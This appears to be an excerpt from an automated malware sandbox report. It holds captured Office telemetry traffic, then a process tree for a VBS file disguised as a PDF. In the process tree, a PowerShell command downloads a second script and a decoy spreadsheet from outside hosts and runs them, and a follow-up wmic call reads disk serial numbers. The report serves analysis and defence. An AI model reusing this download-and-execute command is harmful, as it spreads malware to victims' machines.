                                                                                                        2024-12-09 12:50:34 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        138192.168.2.84986413.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:34 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:34 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:34 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1414
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                        ETag: "0x8DC582BE03B051D"
                                                                                                        x-ms-request-id: 2adc9ba3-201e-005d-7fad-49afb3000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125034Z-r1cf579d778w7n65hC1EWR9b6800000000y0000000001e63
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:34 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        139192.168.2.84986313.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:34 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:34 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:34 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1369
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                        ETag: "0x8DC582BE32FE1A2"
                                                                                                        x-ms-request-id: 5fa529d3-701e-0097-6308-48b8c1000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125034Z-r1cf579d778lntp7hC1EWR9gg400000007wg000000003apf
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:34 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        140192.168.2.84986513.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:34 UTC192OUTGET /rules/rule700750v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:34 UTC515INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:34 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1377
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
                                                                                                        ETag: "0x8DC582BEAFF0125"
                                                                                                        x-ms-request-id: 217a7818-401e-00ac-3104-480a97000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125034Z-r1cf579d778n9656hC1EWRqns000000000k0000000005970
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        X-Cache-Info: L1_T2
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:34 UTC1377INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        141192.168.2.84986613.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:35 UTC192OUTGET /rules/rule700151v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:36 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:35 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1399
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                        ETag: "0x8DC582BE0A2434F"
                                                                                                        x-ms-request-id: b8fa7c57-101e-008e-1803-48cf88000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125035Z-r1cf579d778dndrdhC1EWR4b24000000083g000000002qbw
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:36 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        142192.168.2.84986713.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:35 UTC192OUTGET /rules/rule700150v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:36 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:36 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1362
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                        ETag: "0x8DC582BE54CA33F"
                                                                                                        x-ms-request-id: d011e298-d01e-0066-630e-48ea17000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125036Z-r1cf579d778lntp7hC1EWR9gg400000007xg000000001frk
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:36 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        143192.168.2.84986813.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:36 UTC192OUTGET /rules/rule703451v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:36 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:36 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1409
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                        ETag: "0x8DC582BDFC438CF"
                                                                                                        x-ms-request-id: e9c8fd08-f01e-003f-7806-48d19d000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125036Z-r1cf579d778bb9vvhC1EWRs9540000000820000000001y8b
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:36 UTC1409INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        144192.168.2.84986913.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:36 UTC192OUTGET /rules/rule703450v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:36 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:36 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1372
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                        ETag: "0x8DC582BE6669CA7"
                                                                                                        x-ms-request-id: 74d0292a-401e-002a-25ad-49c62e000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125036Z-r1cf579d778t76vqhC1EWRdx4w000000028g0000000087uq
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:36 UTC1372INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        145192.168.2.84987013.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:36 UTC192OUTGET /rules/rule700901v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:37 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:36 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1408
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                        ETag: "0x8DC582BE1038EF2"
                                                                                                        x-ms-request-id: 09209696-a01e-0021-6305-48814c000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125036Z-r1cf579d778z4wflhC1EWRa3h000000008hg000000000s3b
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:37 UTC1408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                        Click to jump to process

                                                                                                        Click to jump to process

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Click to jump to process

                                                                                                        Target ID:0
                                                                                                        Start time:07:48:11
                                                                                                        Start date:09/12/2024
                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items pdf.vbs"
                                                                                                        Imagebase:0x7ff7d1a80000
                                                                                                        File size:170'496 bytes
                                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:2
                                                                                                        Start time:07:48:11
                                                                                                        Start date:09/12/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/it/it.vbs' -destination 'C:\Users\Public\tk4f2qxkb.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\bsxhli2ob.xlsx'
                                                                                                        Imagebase:0x7ff6cb6b0000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:3
                                                                                                        Start time:07:48:11
                                                                                                        Start date:09/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:4
                                                                                                        Start time:07:48:17
                                                                                                        Start date:09/12/2024
                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\tk4f2qxkb.vbs"
                                                                                                        Imagebase:0x7ff7d1a80000
                                                                                                        File size:170'496 bytes
                                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:5
                                                                                                        Start time:07:48:20
                                                                                                        Start date:09/12/2024
                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:wmic diskdrive get caption,serialnumber
                                                                                                        Imagebase:0x7ff6d3230000
                                                                                                        File size:576'000 bytes
                                                                                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:6
                                                                                                        Start time:07:48:20
                                                                                                        Start date:09/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:7
                                                                                                        Start time:07:48:21
                                                                                                        Start date:09/12/2024
                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):false
